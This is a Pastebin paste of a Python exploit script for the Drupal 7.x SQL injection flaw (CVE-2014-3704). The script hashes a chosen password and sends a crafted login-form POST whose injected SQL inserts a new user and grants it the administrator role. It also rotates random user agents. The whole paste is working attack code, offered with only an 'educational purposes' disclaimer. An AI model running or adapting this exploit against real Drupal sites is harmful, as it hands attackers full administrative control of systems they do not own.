API tools faq
paste
Guest User

Untitled

a guest
Oct 22nd, 2017
35
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.73 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #
  3. #
  4. # Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
  5. # Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
  6. #
  7. # Tested on Drupal 7.31 with BackBox 3.x
  8. #
  9. # This material is intended for educational
  10. # purposes only and the author can not be held liable for
  11. # any kind of damages done whatsoever to your machine,
  12. # or damages caused by some other,creative application of this material.
  13. # In any case you disagree with the above statement,stop here.
  14.  
  15. import hashlib, urllib2, optparse, random, sys
  16.  
  17. # START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
  18. # Calculate a non-truncated Drupal 7 compatible password hash.
  19. # The consumer of these hashes must truncate correctly.
  20.  
  21. class DrupalHash:
  22.  
  23. def __init__(self, stored_hash, password):
  24. self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
  25. self.last_hash = self.rehash(stored_hash, password)
  26.  
  27. def get_hash(self):
  28. return self.last_hash
  29.  
  30. def password_get_count_log2(self, setting):
  31. return self.itoa64.index(setting[3])
  32.  
  33. def password_crypt(self, algo, password, setting):
  34. setting = setting[0:12]
  35. if setting[0] != '$' or setting[2] != '$':
  36. return False
  37.  
  38. count_log2 = self.password_get_count_log2(setting)
  39. salt = setting[4:12]
  40. if len(salt) < 8:
  41. return False
  42. count = 1 << count_log2
  43.  
  44. if algo == 'md5':
  45. hash_func = hashlib.md5
  46. elif algo == 'sha512':
  47. hash_func = hashlib.sha512
  48. else:
  49. return False
  50. hash_str = hash_func(salt + password).digest()
  51. for c in range(count):
  52. hash_str = hash_func(hash_str + password).digest()
  53. output = setting + self.custom64(hash_str)
  54. return output
  55.  
  56. def custom64(self, string, count = 0):
  57. if count == 0:
  58. count = len(string)
  59. output = ''
  60. i = 0
  61. itoa64 = self.itoa64
  62. while 1:
  63. value = ord(string[i])
  64. i += 1
  65. output += itoa64[value & 0x3f]
  66. if i < count:
  67. value |= ord(string[i]) << 8
  68. output += itoa64[(value >> 6) & 0x3f]
  69. if i >= count:
  70. break
  71. i += 1
  72. if i < count:
  73. value |= ord(string[i]) << 16
  74. output += itoa64[(value >> 12) & 0x3f]
  75. if i >= count:
  76. break
  77. i += 1
  78. output += itoa64[(value >> 18) & 0x3f]
  79. if i >= count:
  80. break
  81. return output
  82.  
  83. def rehash(self, stored_hash, password):
  84. # Drupal 6 compatibility
  85. if len(stored_hash) == 32 and stored_hash.find('$') == -1:
  86. return hashlib.md5(password).hexdigest()
  87. # Drupal 7
  88. if stored_hash[0:2] == 'U$':
  89. stored_hash = stored_hash[1:]
  90. password = hashlib.md5(password).hexdigest()
  91. hash_type = stored_hash[0:3]
  92. if hash_type == '$S$':
  93. hash_str = self.password_crypt('sha512', password, stored_hash)
  94. elif hash_type == '$H$' or hash_type == '$P$':
  95. hash_str = self.password_crypt('md5', password, stored_hash)
  96. else:
  97. hash_str = False
  98. return hash_str
  99. # END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
  100.  
  101. def randomAgentGen():
  102.  
  103. userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  104. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  105. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
  106. 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  107. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  108. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  109. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
  110. 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  111. 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  112. 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  113. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  114. 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
  115. 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  116. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  117. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
  118. 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
  119. 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
  120. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
  121. 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  122. 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
  123. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
  124. 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
  125. 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
  126. 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  127. 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  128. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
  129. 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  130. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  131. 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
  132. 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  133. 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  134. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  135. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
  136. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
  137. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
  138. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
  139.  
  140. UA = random.choice(userAgent)
  141. return UA
  142.  
  143.  
  144. def urldrupal(url):
  145. if url[:8] != "https://" and url[:7] != "http://":
  146. print('[X] You must insert http:// or https:// procotol')
  147. sys.exit(1)
  148. # Page login
  149. url = url+'/?q=node&destination=node'
  150. return url
  151.  
  152.  
  153. banner = """
  154. ______ __ _______ _______ _____
  155. | _ \ .----.--.--.-----.---.-| | | _ || _ | _ |
  156. |. | \| _| | | _ | _ | | |___| _|___| |.| |
  157. |. | |__| |_____| __|___._|__| / |___(__ `-|. |
  158. |: 1 / |__| | | |: 1 | |: |
  159. |::.. . / | | |::.. . | |::.|
  160. `------' `---' `-------' `---'
  161. _______ __ ___ __ __ __
  162. | _ .-----| | | .-----|__.-----.----| |_|__.-----.-----.
  163. | 1___| _ | | |. | | | -__| __| _| | _ | |
  164. |____ |__ |__| |. |__|__| |_____|____|____|__|_____|__|__|
  165. |: 1 | |__| |: | |___|
  166. |::.. . | |::.|
  167. `-------' `---'
  168.  
  169. Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
  170. Admin 4cc0unt cr3at0r
  171.  
  172. Discovered by:
  173.  
  174. Stefan Horst
  175. (CVE-2014-3704)
  176.  
  177. Written by:
  178.  
  179. Claudio Viviani
  180.  
  181. http://www.homelab.it
  182.  
  183. info@homelab.it
  184. homelabit@protonmail.ch
  185.  
  186. https://www.facebook.com/homelabit
  187. https://twitter.com/homelabit
  188. https://plus.google.com/+HomelabIt1/
  189. https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  190.  
  191. """
  192.  
  193. commandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\n')
  194. commandList.add_option('-t', '--target',
  195. action="store",
  196. help="Insert URL: http[s]://www.victim.com",
  197. )
  198. commandList.add_option('-u', '--username',
  199. action="store",
  200. help="Insert username",
  201. )
  202. commandList.add_option('-p', '--pwd',
  203. action="store",
  204. help="Insert password",
  205. )
  206. options, remainder = commandList.parse_args()
  207.  
  208. # Check args
  209. if not options.target or not options.username or not options.pwd:
  210. print(banner)
  211. print
  212. commandList.print_help()
  213. sys.exit(1)
  214.  
  215. print(banner)
  216.  
  217. host = options.target
  218. user = options.username
  219. password = options.pwd
  220.  
  221. hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
  222.  
  223. target = urldrupal(host)
  224.  
  225.  
  226. # Add new user:
  227. # insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld' FROM users
  228. #
  229. # Set administrator permission (rid = 3):
  230. # insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3)
  231. #
  232. post_data = "name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27"+user+"%27,+%27"+hash[:55]+"%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27"+user+"%27),+3);;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"
  233.  
  234. UA = randomAgentGen()
  235. try:
  236. req = urllib2.Request(target, post_data, headers={ 'User-Agent': UA })
  237. content = urllib2.urlopen(req).read()
  238.  
  239. if "mb_strlen() expects parameter 1" in content:
  240. print "[!] VULNERABLE!"
  241. print
  242. print "[!] Administrator user created!"
  243. print
  244. print "[*] Login: "+str(user)
  245. print "[*] Pass: "+str(password)
  246. print "[*] Url: "+str(target)
  247.  
  248. else:
  249. print "[X] NOT Vulnerable :("
  250.  
  251. except urllib2.HTTPError as e:
  252.  
  253. print "[X] HTTP Error: "+str(e.reason)+" ("+str(e.code)+")"
  254.  
  255. except urllib2.URLError as e:
  256.  
  257. print "[X] Connection error: "+str(e.reason)
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!